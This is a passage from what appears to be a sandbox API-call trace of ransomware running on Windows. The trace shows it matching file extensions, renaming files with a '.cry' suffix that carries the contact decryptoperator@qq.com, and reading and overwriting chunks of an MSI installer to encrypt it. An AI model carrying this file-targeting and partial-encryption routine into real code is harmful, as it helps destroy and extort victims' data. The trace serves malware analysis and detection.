lpString2=".LOG2") returned -1 [0035.435] lstrlenW (lpString=".pdf") returned 4 [0035.435] lstrcmpiW (lpString1=".pdf", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString=".xls") returned 4 [0035.435] lstrcmpiW (lpString1=".xls", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString=".xlsx") returned 5 [0035.435] lstrcmpiW (lpString1=".xlsx", lpString2=".LOG2") returned 1 [0035.435] lstrlenW (lpString=".ppt") returned 4 [0035.435] lstrcmpiW (lpString1=".ppt", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.435] lstrlenW (lpString=".zip") returned 4 [0035.435] lstrcmpiW (lpString1=".zip", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString=".rar") returned 4 [0035.435] lstrcmpiW (lpString1=".rar", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString=".bz2") returned 4 [0035.435] lstrcmpiW (lpString1=".bz2", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString=".7z") returned 3 [0035.435] lstrcmpiW (lpString1=".7z", lpString2="OG2") returned -1 [0035.435] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.435] lstrlenW (lpString=".dbf") returned 4 [0035.435] lstrcmpiW (lpString1=".dbf", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.435] lstrlenW (lpString=".1cd") returned 4 [0035.435] lstrcmpiW (lpString1=".1cd", lpString2="LOG2") returned -1 [0035.435] lstrlenW (lpString="C:\\Boot\\BCD.LOG2") returned 16 [0035.435] lstrlenW (lpString=".jpg") returned 4 [0035.435] lstrcmpiW (lpString1=".jpg", lpString2="LOG2") returned -1 [0035.435] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.436] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.436] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.436] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=89168) returned 1 [0035.436] CloseHandle (hObject=0x170) returned 1 [0035.436] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui")) returned 0x20 [0035.436] GetFileAttributesW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.436] CreateFileW (lpFileName="C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.436] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.436] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.436] lstrlenW (lpString=".doc") returned 4 [0035.436] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.436] lstrlenW (lpString=".docx") returned 5 [0035.436] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.436] lstrlenW (lpString=".pdf") returned 4 [0035.436] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.436] lstrlenW (lpString=".xls") returned 4 [0035.436] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.436] lstrlenW (lpString=".xlsx") returned 5 [0035.436] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.436] lstrlenW (lpString=".ppt") returned 4 [0035.436] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.437] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.437] lstrlenW (lpString=".zip") returned 4 [0035.437] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.437] lstrlenW (lpString=".rar") returned 4 [0035.437] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.437] lstrlenW (lpString=".bz2") returned 4 [0035.437] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.437] lstrlenW (lpString=".7z") returned 3 [0035.437] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.437] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.437] lstrlenW (lpString=".dbf") returned 4 [0035.437] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.437] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.437] lstrlenW (lpString=".1cd") returned 4 [0035.437] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.437] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.437] lstrlenW (lpString=".jpg") returned 4 [0035.437] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.437] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.437] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.437] lstrlenW (lpString=".doc") returned 4 [0035.437] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.437] lstrlenW (lpString=".docx") returned 5 [0035.437] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.437] lstrlenW (lpString=".pdf") returned 4 [0035.437] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.437] lstrlenW (lpString=".xls") returned 4 [0035.437] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.437] lstrlenW (lpString=".xlsx") returned 5 [0035.437] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.437] lstrlenW (lpString=".ppt") returned 4 [0035.437] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.437] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.437] lstrlenW (lpString=".zip") returned 4 [0035.437] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.437] lstrlenW (lpString=".rar") returned 4 [0035.437] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.437] lstrlenW (lpString=".bz2") returned 4 [0035.438] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.438] lstrlenW (lpString=".7z") returned 3 [0035.438] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.438] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.438] lstrlenW (lpString=".dbf") returned 4 [0035.438] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.438] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.438] lstrlenW (lpString=".1cd") returned 4 [0035.438] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.438] lstrlenW (lpString="C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 29 [0035.438] lstrlenW (lpString=".jpg") returned 4 [0035.438] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.438] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.438] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.438] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.438] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=87616) returned 1 [0035.438] CloseHandle (hObject=0x170) returned 1 [0035.438] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui")) returned 0x20 [0035.438] GetFileAttributesW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.438] CreateFileW (lpFileName="C:\\Boot\\da-DK\\bootmgr.exe.mui" (normalized: "c:\\boot\\da-dk\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.438] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.438] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.438] lstrlenW (lpString=".doc") returned 4 [0035.439] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.439] lstrlenW (lpString=".docx") returned 5 [0035.439] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.439] lstrlenW (lpString=".pdf") returned 4 [0035.439] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.439] lstrlenW (lpString=".xls") returned 4 [0035.439] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.439] lstrlenW (lpString=".xlsx") returned 5 [0035.439] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.439] lstrlenW (lpString=".ppt") returned 4 [0035.439] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.439] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.439] lstrlenW (lpString=".zip") returned 4 [0035.439] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.439] lstrlenW (lpString=".rar") returned 4 [0035.439] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.439] lstrlenW (lpString=".bz2") returned 4 [0035.439] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.439] lstrlenW (lpString=".7z") returned 3 [0035.439] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.439] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.439] lstrlenW (lpString=".dbf") returned 4 [0035.439] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.439] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.439] lstrlenW (lpString=".1cd") returned 4 [0035.439] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.439] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.439] lstrlenW (lpString=".jpg") returned 4 [0035.439] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.439] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.439] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.439] lstrlenW (lpString=".doc") returned 4 [0035.439] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.439] lstrlenW (lpString=".docx") returned 5 [0035.439] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.439] lstrlenW (lpString=".pdf") returned 4 [0035.439] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.439] lstrlenW (lpString=".xls") returned 4 [0035.439] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.440] lstrlenW (lpString=".xlsx") returned 5 [0035.440] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.440] lstrlenW (lpString=".ppt") returned 4 [0035.440] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.440] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.440] lstrlenW (lpString=".zip") returned 4 [0035.440] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.440] lstrlenW (lpString=".rar") returned 4 [0035.440] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.440] lstrlenW (lpString=".bz2") returned 4 [0035.440] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.440] lstrlenW (lpString=".7z") returned 3 [0035.440] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.440] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.440] lstrlenW (lpString=".dbf") returned 4 [0035.440] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.440] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.440] lstrlenW (lpString=".1cd") returned 4 [0035.440] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.440] lstrlenW (lpString="C:\\Boot\\da-DK\\bootmgr.exe.mui") returned 29 [0035.440] lstrlenW (lpString=".jpg") returned 4 [0035.440] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.440] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.440] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.440] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.440] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=91712) returned 1 [0035.440] CloseHandle (hObject=0x170) returned 1 [0035.441] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui")) returned 0x20 [0035.441] GetFileAttributesW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.441] CreateFileW (lpFileName="C:\\Boot\\de-DE\\bootmgr.exe.mui" (normalized: "c:\\boot\\de-de\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.441] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.442] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.442] lstrlenW (lpString=".doc") returned 4 [0035.442] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.442] lstrlenW (lpString=".docx") returned 5 [0035.442] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.442] lstrlenW (lpString=".pdf") returned 4 [0035.442] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.442] lstrlenW (lpString=".xls") returned 4 [0035.442] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.442] lstrlenW (lpString=".xlsx") returned 5 [0035.442] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.442] lstrlenW (lpString=".ppt") returned 4 [0035.442] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.442] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.442] lstrlenW (lpString=".zip") returned 4 [0035.442] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.442] lstrlenW (lpString=".rar") returned 4 [0035.442] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.442] lstrlenW (lpString=".bz2") returned 4 [0035.442] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.442] lstrlenW (lpString=".7z") returned 3 [0035.442] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.442] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.442] lstrlenW (lpString=".dbf") returned 4 [0035.442] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.442] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.442] lstrlenW (lpString=".1cd") returned 4 [0035.442] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.442] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.442] lstrlenW (lpString=".jpg") returned 4 [0035.442] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.442] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.442] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.442] lstrlenW (lpString=".doc") returned 4 [0035.442] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.442] lstrlenW (lpString=".docx") returned 5 [0035.442] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.442] lstrlenW (lpString=".pdf") returned 4 [0035.443] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.443] lstrlenW (lpString=".xls") returned 4 [0035.443] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.443] lstrlenW (lpString=".xlsx") returned 5 [0035.443] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.443] lstrlenW (lpString=".ppt") returned 4 [0035.443] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.443] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.443] lstrlenW (lpString=".zip") returned 4 [0035.446] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.446] lstrlenW (lpString=".rar") returned 4 [0035.446] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.446] lstrlenW (lpString=".bz2") returned 4 [0035.446] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.446] lstrlenW (lpString=".7z") returned 3 [0035.446] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.446] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.446] lstrlenW (lpString=".dbf") returned 4 [0035.446] lstrcmpiW (lpString1=".dbf", lpString2=".mui") returned -1 [0035.446] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.446] lstrlenW (lpString=".1cd") returned 4 [0035.446] lstrcmpiW (lpString1=".1cd", lpString2=".mui") returned -1 [0035.446] lstrlenW (lpString="C:\\Boot\\de-DE\\bootmgr.exe.mui") returned 29 [0035.446] lstrlenW (lpString=".jpg") returned 4 [0035.446] lstrcmpiW (lpString1=".jpg", lpString2=".mui") returned -1 [0035.446] lstrcmpiW (lpString1=".mui", lpString2=".cry") returned 1 [0035.446] lstrlenW (lpString="bootmgr.exe.mui") returned 15 [0035.446] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x170 [0035.446] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=94800) returned 1 [0035.447] CloseHandle (hObject=0x170) returned 1 [0035.447] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui")) returned 0x20 [0035.447] GetFileAttributesW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0035.447] CreateFileW (lpFileName="C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0035.447] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0035.447] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0035.447] lstrlenW (lpString=".doc") returned 4 [0035.447] lstrcmpiW (lpString1=".doc", lpString2=".mui") returned -1 [0035.447] lstrlenW (lpString=".docx") returned 5 [0035.447] lstrcmpiW (lpString1=".docx", lpString2="e.mui") returned -1 [0035.447] lstrlenW (lpString=".pdf") returned 4 [0035.447] lstrcmpiW (lpString1=".pdf", lpString2=".mui") returned 1 [0035.447] lstrlenW (lpString=".xls") returned 4 [0035.447] lstrcmpiW (lpString1=".xls", lpString2=".mui") returned 1 [0035.447] lstrlenW (lpString=".xlsx") returned 5 [0035.447] lstrcmpiW (lpString1=".xlsx", lpString2="e.mui") returned -1 [0035.447] lstrlenW (lpString=".ppt") returned 4 [0035.447] lstrcmpiW (lpString1=".ppt", lpString2=".mui") returned 1 [0035.447] lstrlenW (lpString="C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 29 [0035.447] lstrlenW (lpString=".zip") returned 4 [0035.447] lstrcmpiW (lpString1=".zip", lpString2=".mui") returned 1 [0035.447] lstrlenW (lpString=".rar") returned 4 [0035.447] lstrcmpiW (lpString1=".rar", lpString2=".mui") returned 1 [0035.447] lstrlenW (lpString=".bz2") returned 4 [0035.447] lstrcmpiW (lpString1=".bz2", lpString2=".mui") returned -1 [0035.447] lstrlenW (lpString=".7z") returned 3 [0035.447] lstrcmpiW (lpString1=".7z", lpString2="mui") returned -1 [0035.448] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\chs_boot.ttf" (normalized: "c:\\boot\\fonts\\chs_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\chs_boot.ttf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\fonts\\chs_boot.ttf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0036.032] MoveFileW (lpExistingFileName="C:\\Boot\\Fonts\\cht_boot.ttf" (normalized: "c:\\boot\\fonts\\cht_boot.ttf"), lpNewFileName="C:\\Boot\\Fonts\\cht_boot.ttf.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\boot\\fonts\\cht_boot.ttf.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0 [0036.032] GetFileSizeEx (in: hFile=0x16c, lpFileSize=0x2b1ff1c | out: lpFileSize=0x2b1ff1c*=2503680) returned 1 [0036.032] CloseHandle (hObject=0x16c) returned 1 [0036.032] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi")) returned 0x2020 [0036.032] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 0xffffffff [0036.032] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[decryptoperator@qq.com].cry")) returned 1 [0036.033] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0018-0409-1000-0000000FF1CE}-C\\PowerPointMUI.msi.id-9C354B42.[decryptoperator@qq.com].cry" (normalized: "c:\\msocache\\all users\\{90140000-0018-0409-1000-0000000ff1ce}-c\\powerpointmui.msi.id-9c354b42.[decryptoperator@qq.com].cry"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x16c [0036.033] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0x0) returned 1 [0036.033] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.033] ReadFile (in: hFile=0x16c, lpBuffer=0x3630058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3630058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.085] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.085] ReadFile (in: hFile=0x16c, lpBuffer=0x3670058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x3670058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.104] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x2b1fc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0036.104] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc2c | out: lpNewFilePointer=0x0) returned 1 [0036.104] ReadFile (in: hFile=0x16c, lpBuffer=0x36b0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x2b1fc38, lpOverlapped=0x0 | out: lpBuffer=0x36b0058*, lpNumberOfBytesRead=0x2b1fc38*=0x40000, lpOverlapped=0x0) returned 1 [0036.128] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fec8 | out: lpNewFilePointer=0x0) returned 1 [0036.128] WriteFile (in: hFile=0x16c, lpBuffer=0x3630020*, nNumberOfBytesToWrite=0xc010e, lpNumberOfBytesWritten=0x2b1fcb0, lpOverlapped=0x0 | out: lpBuffer=0x3630020*, lpNumberOfBytesWritten=0x2b1fcb0*=0xc010e, lpOverlapped=0x0) returned 1 [0036.543] SetEndOfFile (hFile=0x16c) returned 1 [0036.543] RtlAllocateHeap (HeapHandle=0x600000, Flags=0x0, Size=0x40000) returned 0x3f30090 [0036.547] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.547] WriteFile (in: hFile=0x16c, lpBuffer=0x3f30090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30090*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.549] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0xcbc00, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.549] WriteFile (in: hFile=0x16c, lpBuffer=0x3f30090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30090*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.554] SetFilePointerEx (in: hFile=0x16c, liDistanceToMove=0x223400, lpNewFilePointer=0x0, dwMoveMethod=0x2b1fc7c | out: lpNewFilePointer=0x0) returned 1 [0036.554] WriteFile (in: hFile=0x16c, lpBuffer=0x3f30090*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x2b1fc88, lpOverlapped=0x0 | out: lpBuffer=0x3f30090*, lpNumberOfBytesWritten=0x2b1fc88*=0x40000, lpOverlapped=0x0) returned 1 [0036.557] HeapFree 